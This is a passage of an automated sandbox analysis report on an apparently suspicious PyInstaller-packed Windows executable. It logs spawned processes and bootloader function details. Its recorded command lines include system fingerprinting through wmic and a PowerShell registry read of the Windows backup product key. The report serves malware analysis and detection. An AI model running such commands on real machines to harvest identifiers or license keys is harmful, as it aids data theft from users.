Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 280, Parent PID: 980

General

Target ID:	81
Start time:	23:57:32
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	23:57:32
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	23:57:33
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	23:57:33
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	23:57:33
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	23:57:34
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6472, Parent PID: 4936

General

Target ID:	87
Start time:	23:57:34
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	23:57:34
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	23:57:35
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	23:57:35
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	23:57:35
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF7320689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068A56

Part of subcall function 00007FF73207A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73207A490

Part of subcall function 00007FF73207871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068AE6
CreateProcessW.KERNELBASE ref: 00007FF732068B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068B28

Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99

RegisterClassW.USER32 ref: 00007FF732068B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068B8B
CreateWindowExW.USER32 ref: 00007FF732068BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C15
PeekMessageW.USER32 ref: 00007FF732068C39
TranslateMessage.USER32 ref: 00007FF732068C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C51
PeekMessageW.USER32 ref: 00007FF732068C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E04
GetExitCodeProcess.KERNELBASE ref: 00007FF732068E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E2F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF732068B54
Failed to create child process!, xrefs: 00007FF732068B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF732068B95
CreateProcessW, xrefs: 00007FF732068B37

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 0f3fcc71c99d91d152d4c9e453354d3c2ea977a92c1cc27beb717180c93d1ef3
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: C2D18431B08B82A6EB10AF74E8942BAB760FF84B58F800235DA5D47AA5DF7CD14DD714

Function 00007FF732061000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MEI, xrefs: 00007FF732063933
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF732063D12
Failed to start splash screen!, xrefs: 00007FF732063ED4
pkg, xrefs: 00007FF7320639BE
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF732063C61
Failed to convert DLL search path!, xrefs: 00007FF732063DDC
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF732063BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7320639DE
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF732063A17, 00007FF732063A2F, 00007FF732063A9B
Failed to remove temporary directory: %s, xrefs: 00007FF732063FCF
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF732063E0A
Failed to load splash screen resources!, xrefs: 00007FF732063E85
Could not create temporary directory!, xrefs: 00007FF732063CBF
_PYI_ARCHIVE_FILE, xrefs: 00007FF7320638D2, 00007FF7320639FF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF732063EBB
VCRUNTIME140.dll, xrefs: 00007FF732063DB1
_PYI_SPLASH_IPC, xrefs: 00007FF732063A23, 00007FF732063EF5
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF732063971
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF732063882, 00007FF7320638AF
pyi-python-flag, xrefs: 00007FF732063AD6
pyi-runtime-tmpdir, xrefs: 00007FF732063B68
Py_GIL_DISABLED, xrefs: 00007FF732063AF4
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF732063A0B, 00007FF732063CD4, 00007FF732063F6B
pyi-contents-directory, xrefs: 00007FF732063B8D
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF732063EA6
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF732063D35
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF732063B32
pyi-disable-windowed-traceback, xrefs: 00007FF732063BB2

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
Instruction ID: 8f7f528829b4290758f5c6021b6df81c97e115fe6210bf7ae367767ce32e76d3
Opcode Fuzzy Hash: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
Instruction Fuzzy Hash: 5D32AB21B08682B5FB18BB3494553BAE6A1EF45B80FC44032DA5D432D6EFACE55CE374

Function 00007FF732085C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF732085C45

Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC

Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

Part of subcall function 00007FF73207A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A909
Part of subcall function 00007FF73207A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A92E

_get_daylight.LIBCMT ref: 00007FF732085C34

Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C

_get_daylight.LIBCMT ref: 00007FF732085EAA
_get_daylight.LIBCMT ref: 00007FF732085EBB
_get_daylight.LIBCMT ref: 00007FF732085ECC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3

Strings

Eastern Standard Time, xrefs: 00007FF732085F99
Eastern Summer Time, xrefs: 00007FF732085FB1

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: 8afa3c6fb46f86bfbe3d2fda8b234fdb1bc88e3c05afed86e31a574ae7926d18
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: 54D1F632A0824266E720FF65D4911BAEB91FF84784FC54035DE0D47696DFBCE449E760

Function 00007FF732086964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320866D9
Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732086757
Part of subcall function 00007FF732086698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320867A8

CreateFileW.KERNELBASE ref: 00007FF732086A6A
CreateFileW.KERNEL32 ref: 00007FF732086ABA
GetLastError.KERNEL32 ref: 00007FF732086AEA
GetFileType.KERNELBASE ref: 00007FF732086AFF
GetLastError.KERNEL32 ref: 00007FF732086B09
CloseHandle.KERNEL32 ref: 00007FF732086B3C
CloseHandle.KERNEL32 ref: 00007FF732086C9F
CreateFileW.KERNEL32 ref: 00007FF732086CD4
GetLastError.KERNEL32 ref: 00007FF732086CE3

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: bb852ee9146f8da58719cd6dd1fd98c8801e4ce85c16be6e33d4027131075355
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 7FC1DF32B28A4596EB10EFA9C4802BD7771F749BA8F810235DA2E9B7D4DF78D059D310

Function 00007FF7320683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF73206842B
RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684AE
DeleteFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684CD
FindNextFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684DB
FindClose.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684EC
RemoveDirectoryW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684F5

Strings

%s\*, xrefs: 00007FF7320683F2

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
Instruction ID: 692f105b74414b0cf88b93048db4bf81d73cd91066cfb5e7541dae3b84839ba2
Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
Instruction Fuzzy Hash: 33416221B0C542A5EE20BB64F4841BAA3A0FF94754FC00232EA9D83AD4EFBCD54DD764

Function 00007FF732085E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF732085EAA

Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C

_get_daylight.LIBCMT ref: 00007FF732085EBB

Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC

_get_daylight.LIBCMT ref: 00007FF732085ECC

Part of subcall function 00007FF7320855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855DC

Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3

Strings

Eastern Standard Time, xrefs: 00007FF732085F99
Eastern Summer Time, xrefs: 00007FF732085FB1

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: ad0385f4b0f1b262279072445e17238f0daa9bbdaece61cdeeaa393386809975
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 2851B532A08642A6E750FF31D8815BAF761FB88784FC14135EA4D47696DFBCE409E760

Function 00007FF732069280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7320692B3
FindClose.KERNELBASE ref: 00007FF7320692C2

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 02c21f81cf5930699b53effc15c3261ef440a048d7f8fde97923d82809baa6ad
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 42F0A422A1864686F7609B60B488776F350EB84328F840235DAAD02AD4DF7CD04CDB04

Function 00007FF7320808C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: a6d6cd5d5dfe5c6d7f8d346c34cfac0cffeeadeff2f1888ef831a98d9c8c0a75
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: 7C020F22B1D78360FA90BB15A50027BE691EF45BA0FC58634DD6D067D2EEFDA419E330

Function 00007FF732061950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732067F90: _fread_nolock.LIBCMT ref: 00007FF73206803A

_fread_nolock.LIBCMT ref: 00007FF732061A1B

Part of subcall function 00007FF732062910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E

Strings

MEI, xrefs: 00007FF732061991
Error on file., xrefs: 00007FF732061B8D
Could not allocate buffer for TOC!, xrefs: 00007FF732061B1B
fread, xrefs: 00007FF732061A32, 00007FF732061B5C
fseek, xrefs: 00007FF7320619F5
Failed to read cookie!, xrefs: 00007FF732061A2B
Failed to seek to cookie position!, xrefs: 00007FF7320619EE
malloc, xrefs: 00007FF732061B22
Could not allocate memory for archive structure!, xrefs: 00007FF732061A61
calloc, xrefs: 00007FF732061A68
Could not read full TOC!, xrefs: 00007FF732061B55

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

